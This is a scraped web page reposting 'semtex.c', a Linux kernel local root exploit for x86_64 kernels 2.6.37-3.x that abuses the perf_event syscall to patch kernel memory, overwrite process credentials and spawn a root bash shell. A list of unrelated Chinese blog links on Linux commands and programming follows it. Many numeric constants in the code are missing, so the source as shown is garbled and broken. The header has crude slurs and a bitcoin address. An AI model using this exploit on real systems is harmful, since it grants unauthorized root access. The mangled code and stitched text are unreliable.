/*

 * linux 2.6.37-3.x.x x86_64, ~100 LOC

 * gcc-4.6 -O2 semtex.c && ./a.out

 * 2010 sd@fucksheep.org, salut!

 *

 * update may 2013:

 * seems like centos 2.6.32 backported the perf bug, lol.

 * jewgold to 115T6jzGrVMgQ2Nt1Wnua7Ch1EuL9WXT2g if you insist.

 */

#define _GNU_SOURCE 1

#include <stdint.h>

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <unistd.h>

#include <sys/mman.h>

#include <syscall.h>

#include <stdint.h>

#include <assert.h>

#define BASE  0x380000000

#define SIZE  0x010000000

#define KSIZE  0x2000000

#define AB(x) ((uint64_t)((0xababababLL<<32)^((uint64_t)((x)*313337))))

void fuck() {

  int i,j,k;

  uint64_t uids[] = { AB(), AB(), AB(), AB() };

  uint8_t *current = *(uint8_t **)(((uint64_t)uids) & (-));

  uint64_t kbase = ((uint64_t)current)>>;

  uint32_t *fixptr = (void*) AB();

  *fixptr = -;

  for (i=; i<; i+=) {

    uint64_t *p = (void *)&current[i];

    uint32_t *t = (void*) p[];

    if ((p[] != p[]) || ((p[]>>) != kbase)) continue;

    for (j=; j<; j++) { for (k = ; k < ; k++)

      if (((uint32_t*)uids)[k] != t[j+k]) goto next;

      for (i = ; i < ; i++) t[j+i] = ;

      for (i = ; i < ; i++) t[j++i] = -;

      return;

next:;    }

  }

}

void sheep(uint32_t off) {

  uint64_t buf[] = { 0x4800000001,off,,,,0x300 };

  int fd = syscall(, buf, , -, -, );

  assert(!close(fd));

}

int  main() {

  uint64_t  u,g,needle, kbase, *p; uint8_t *code;

  uint32_t *map, j = ;

  int i;

  struct {

    uint16_t limit;

    uint64_t addr;

  } __attribute__((packed)) idt;

  assert((map = mmap((void*)BASE, SIZE, , 0x32, ,)) == (void*)BASE);

  memset(map, , SIZE);

  sheep(-); sheep(-);

  for (i = ; i < SIZE/; i++) if (map[i]) {

    assert(map[i+]);

    break;

  }

  assert(i<SIZE/);

  asm ("sidt %0" : "=m" (idt));

  kbase = idt.addr & 0xff000000;

  u = getuid(); g = getgid();

  assert((code = (void*)mmap((void*)kbase, KSIZE, , 0x32, , )) == (void*)kbase);

  memset(code, 0x90, KSIZE); code += KSIZE-; memcpy(code, &fuck, );

  memcpy(code-,"\x0f\x01\xf8\xe8\5\0\0\0\x0f\x01\xf8\x48\xcf",

    printf("2.6.37-3.x x86_64\nsd@fucksheep.org 2010\n") % );

  setresuid(u,u,u); setresgid(g,g,g);

  while (j--) {

    needle = AB(j+);

    assert(p = memmem(code, , &needle, ));

    if (!p) continue;

    *p = j?((g<<)|u):(idt.addr + 0x48);

  }

  sheep(-i + (((idt.addr&0xffffffff)-0x80000000)/) + );

  asm("int $0x4");  assert(!setuid());

  return execl("/bin/bash", "-sh", NULL);

}

linux 2.6.37-3.x.x x86_64的更多相关文章

  1. 每天一个linux命令(37):date命令

    在linux环境中,不管是编程还是其他维护,时间是必不可少的,也经常会用到时间的运算,熟练运用date命令来表示自己想要表示的时间,肯定可以给自己的工作带来诸多方便. 1.命令格式: date [参数 ...

  2. vbox下安装 linux 64 bit出现“kernel requires an x86_64 cpu

        今天在vbox下安装linux 64bit出现"kernel requires an x86_64 cpu, but only detected "的错误,网上有很多文章介 ...

  3. 【转】每天一个linux命令(37):date命令

    原文网址:http://www.cnblogs.com/peida/archive/2012/12/13/2815687.html 在linux环境中,不管是编程还是其他维护,时间是必不可少的,也经常 ...

  4. 每天一个linux命令(37):free 命令

    free命令可以显示Linux系统中空闲的.已用的物理内存及swap内存,及被内核使用的buffer.在Linux系统监控的工具中,free命令是最经常使用的命令之一. 1.命令格式: free [参 ...

  5. tenda u1 usb wireless device install driver for kali linux kernal Debian 4.3.3-7kali2 (2016-01-27) x86_64 GNU/Linux

    因为内核比较新的关系,tenda官方网站上面提供给u1无线网卡的驱动并不能正常编译使用,编译的时候报一个类似错误 /usr/src/linux-headers--kali1-common/Makefi ...

  6. linux每日命令(37):top命令

    top命令是Linux下常用的性能分析工具,能够实时显示系统中各个进程的资源占用状况,类似于Windows的任务管理器.下面详细介绍它的使用方法.top是一个动态显示过程,即可以通过用户按键来不断刷新 ...

  7. linux 下安装mysql-5.7.12-1.el6.x86_64.rpm-bundle.tar

    -rw-rw-r--. hadoop hadoop Nov : mysql--.el6.x86_64.rpm-bundle.tar tar -xvf mysql-5.7.12-1.el6.x86_64 ...

  8. 《Linux命令行与shell脚本编程大全 第3版》Linux命令行---37

    以下为阅读<Linux命令行与shell脚本编程大全 第3版>的读书笔记,为了方便记录,特地与书的内容保持同步,特意做成一节一次随笔,特记录如下:

  9. 每天一个Linux命令(37)kill命令

          Linux中的kill命令用来终止指定的进程(terminate a process)的运行. kill可将指定的信息送至程序.预设的信息为SIGTERM(15),可将指定程序终止.   ...

  10. 『学了就忘』Linux基础命令 — 37、Linux中挂载操作的相关命令

    目录 1.mount命令介绍 (1)mount命令说明 (2)mount命令格式 2.mount命令示例 3.mount -a命令说明 4.-o特殊选项说明 5.exec/noexec选项说明 挂载就 ...

随机推荐

  1. 70 数组的Kmin算法和二叉搜索树的Kmin算法对比

    [本文链接] http://www.cnblogs.com/hellogiser/p/kmin-of-array-vs-kmin-of-bst.html [分析] 数组的Kmin算法和二叉搜索树的Km ...

  2. 43. 动态规划求解n个骰子的点数和出现概率(或次数)[Print sum S probability of N dices]

    [题目] 把N个骰子扔在地上,所有骰子朝上一面的点数之和为S.输入N,打印出S的所有可能的值出现的概率. [分析] 典型的动态规划题目. 设n个骰子的和为s出现的次数记为f(n,s),其中n=[1-N ...

  3. 转MYSQL学习(三) 函数

    这一节主要介绍MYSQL里的函数,MYSQL里的函数很多,我这里主要介绍MYSQL里有而SQLSERVER没有的函数 数学函数 1.求余函数MOD(X,Y) MOD(X,Y)返回x被y除后的余数,MO ...

  4. poj 3750 小孩报数问题 解题报告

    题目链接:http://poj.org/problem?id=3750 约瑟夫问题,直接模拟即可. #include <iostream> #include <string> ...

  5. ubuntu命令行相关命令使用心得

    一.Ubuntu解压缩zip,tar,tar.gz,tar.bz2 ZIP zip可能是目前使用得最多的文档压缩格式.它最大的优点就是在不同的操作系统平台,比如Linux, Windows以及Mac ...

  6. 使用Memory Analyzer tool(MAT)分析内存泄漏(二)

    转载自:http://www.blogjava.net/rosen/archive/2010/06/13/323522.html 前言的前言 写blog就是好,在大前提下可以想说什么写什么,不像投稿那 ...

  7. dbVisualizer破解

    下载dbvis.puk,替换C:\Program Files\DbVisualizer\lib\dbvis.jar中的文件. 替换后打开选手动的key:下载地址dbvis.license

  8. php 正则表达式

    <?php //正则表达式 //定界符:斜杠:/正则/ //匹配开始:^ //匹配结束:$ /*\d代表一个数字 \w代表一个单词 */ $zz = "/(13[0-9]|14[5|7 ...

  9. Codeigniter CRUD代码快速构建

    一个与数据库操作打交道的应用,必然涉及到数据的添加.修改.删除等操作.因此CRUD操作几乎成为每个后台管理站点的必备功能.数据库的复杂性,导致PHP操作代码也会有不少的冗余,因此,如果可以有工具自动生 ...

  10. Z-XML团队 软件工程课之我感我思我收获

    <软件工程>这门课像我们的诤友,不断督促我们前进,又不断指引我们收获.时间飞逝,我们Z-XML团队一个个完成了课程中的所有任务,一步步走到了期末年末. 走的远了,也该回头看看.全员7人回顾 ...